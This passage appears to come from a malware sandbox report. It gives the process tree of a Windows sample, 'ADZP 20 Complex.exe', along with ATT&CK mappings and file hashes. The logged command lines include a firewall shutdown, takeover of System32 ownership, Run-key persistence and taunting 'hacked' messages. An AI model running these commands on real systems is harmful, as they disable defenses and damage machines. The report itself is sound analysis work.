        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:6312
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B788.tmp\B789.tmp\B78A.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:6568
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:7356
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:7492
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:7444
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:5636
        
        C:\Windows\SysWOW64\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8464
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:8496
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:8648
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:8908
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        
        PID:7324
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:9064
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:6064
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:9356
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:9444
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:9644
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:9664
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:9896
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:10100
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10124
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:5732
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:1976
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D443.tmp\D444.tmp\D454.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:10256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        9⤵
        
        PID:13132
        
        C:\Windows\System32\Twain_20.dll
        
        C:\Windows\System32\Twain_20.dll
        10⤵
        
        PID:14196
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9C84.tmp\9C85.tmp\9C86.bat C:\Windows\System32\Twain_20.dll"
        11⤵
        
        PID:11468
        
        C:\Windows\system32\reg.exe
        
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
        10⤵
        
        PID:15140
        
        C:\Windows\System32\Twain_20.dll
        
        C:\Windows\System32\Twain_20.dll
        10⤵
        
        PID:11128
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        9⤵
        Modifies Windows Firewall
        
        PID:8972
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        9⤵
        
        PID:13328
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:11880
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        
        PID:10544
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        9⤵
        
        PID:13264
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        9⤵
        
        PID:7264
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        9⤵
        Gathers network information
        
        PID:9624
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        9⤵
        Kills process with taskkill
        
        PID:15076
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        7⤵
        
        PID:7336
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:10508
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:10580
        
        C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        7⤵
        
        PID:10692
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:10840
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EE43.tmp\EE54.tmp\EE55.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:11084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        9⤵
        
        PID:13784
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        9⤵
        Modifies Windows Firewall
        
        PID:9296
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        9⤵
        
        PID:8268
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:7144
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32" /reset /t /c /q
        10⤵
        Possible privilege escalation attempt
        
        PID:9372
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        9⤵
        
        PID:14900
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        9⤵
        
        PID:9164
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        9⤵
        Gathers network information
        
        PID:15068
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        7⤵
        
        PID:10956
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:11148
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:11248
        
        C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        7⤵
        
        PID:8960
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:7508
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7F5.tmp\7F6.tmp\7F7.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:8036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        9⤵
        
        PID:8048
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        9⤵
        Modifies Windows Firewall
        
        PID:10196
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        9⤵
        
        PID:12056
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        9⤵
        
        PID:13148
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:12592
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Modifies file permissions
        
        PID:7600
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        9⤵
        
        PID:9272
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        9⤵
        
        PID:6488
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        9⤵
        Gathers network information
        
        PID:7852
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        9⤵
        Kills process with taskkill
        
        PID:12440
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        9⤵
        Views/modifies file attributes
        
        PID:7124
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        7⤵
        
        PID:7340
        
        C:\Windows\SysWOW64\calc.exe
        
        calc
        7⤵
        
        PID:7672
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7980
        
        C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        7⤵
        
        PID:10368
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:8888
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10092
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:12836
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:4404
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:1152
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:6456
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:6628
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:6644
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:6808
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:7008
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C64D.tmp\C64E.tmp\C64F.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:7276
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:7604
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:1376
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:8172
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:5708
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8376
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:8452
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:8580
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:8848
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        
        PID:8648
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:5572
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10228
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:8688
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:9156
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:2412
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10264
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:10624
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10884
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:11216
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:10308
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:8460
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        7⤵
        
        PID:11172
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        7⤵
        
        PID:5584
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        7⤵
        
        PID:9160
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:11416
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3F90.tmp\3FDF.tmp\3FE0.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:11928
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:11620
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:11784
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:12088
        
        C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        7⤵
        
        PID:11116
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:12352
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\67F7.tmp\67F8.tmp\67F9.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:13176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        9⤵
        
        PID:5264
        
        C:\Windows\System32\Twain_20.dll
        
        C:\Windows\System32\Twain_20.dll
        10⤵
        
        PID:7268
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B22F.tmp\B230.tmp\B231.bat C:\Windows\System32\Twain_20.dll"
        11⤵
        
        PID:6748
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        12⤵
        
        PID:1448
        
        C:\Windows\System32\Twain_20.dll
        
        C:\Windows\System32\Twain_20.dll
        13⤵
        
        PID:14688
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4497.tmp\4498.tmp\4499.bat C:\Windows\System32\Twain_20.dll"
        14⤵
        
        PID:14168
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        12⤵
        Modifies Windows Firewall
        
        PID:12844
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        12⤵
        
        PID:14436
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        12⤵
        
        PID:6300
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        9⤵
        Modifies Windows Firewall
        
        PID:11556
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        9⤵
        
        PID:3868
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        9⤵
        
        PID:12260
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:6820
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        
        PID:9464
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        9⤵
        
        PID:13384
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        9⤵
        
        PID:12480
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        9⤵
        Gathers network information
        
        PID:14452
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        9⤵
        Kills process with taskkill
        
        PID:13968
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:12820
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:13100
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:6988
        
        C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        7⤵
        
        PID:12724
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:13364
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\89C8.tmp\89C9.tmp\89CA.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:13856
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:13672
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:13948
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:14128
        
        C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        7⤵
        
        PID:14268
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:14432
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:15216
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:14872
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        7⤵
        
        PID:7096
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:6528
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:7264
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:7416
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:7528
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:8812
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:8536
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:4036
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:8820
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:2396
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:8952
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:1980
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:4828
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:3916
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    PID:1952
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
    3⤵
    PID:5300
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
    3⤵
    PID:5340
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
    3⤵
    PID:5524
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
    3⤵
    PID:5620
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
    3⤵
    PID:5752
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
    3⤵
    PID:5884

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:2560

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:3208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:1968

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5176

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6352

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6636

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6972

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7000

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7396

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7520

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6500

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6960

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6676

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:10640

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8720

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:3744

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9800

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:11720

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:12176

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:11732

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:12656

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:12852

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:13116

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6504

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9656

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:13580

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:13820

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:14260

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:12480

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:14392

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:2816

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7160

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\46AE.tmp\46AF.tmp\46B0.bat

Filesize
17KB

MD5
190e7cfa7d6de532ba4498ca3d38b47d

SHA1
7d4ea5ce61962c0445d955a44dd31226fa8c736e

SHA256
faee2b0ac2218435a6973b87277b29010c988efefdcd7fe0e107808c2cc0f282

SHA512
5a87b4bac67957acbc6dfab08cf9b3e1110e4b496b66110a44f7b2d0ec75b950d7569b6220c4a5ab3597db032e70b16d5a5e6ee4ab23102f6d12fea7bdc11598

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs

Filesize
60B

MD5
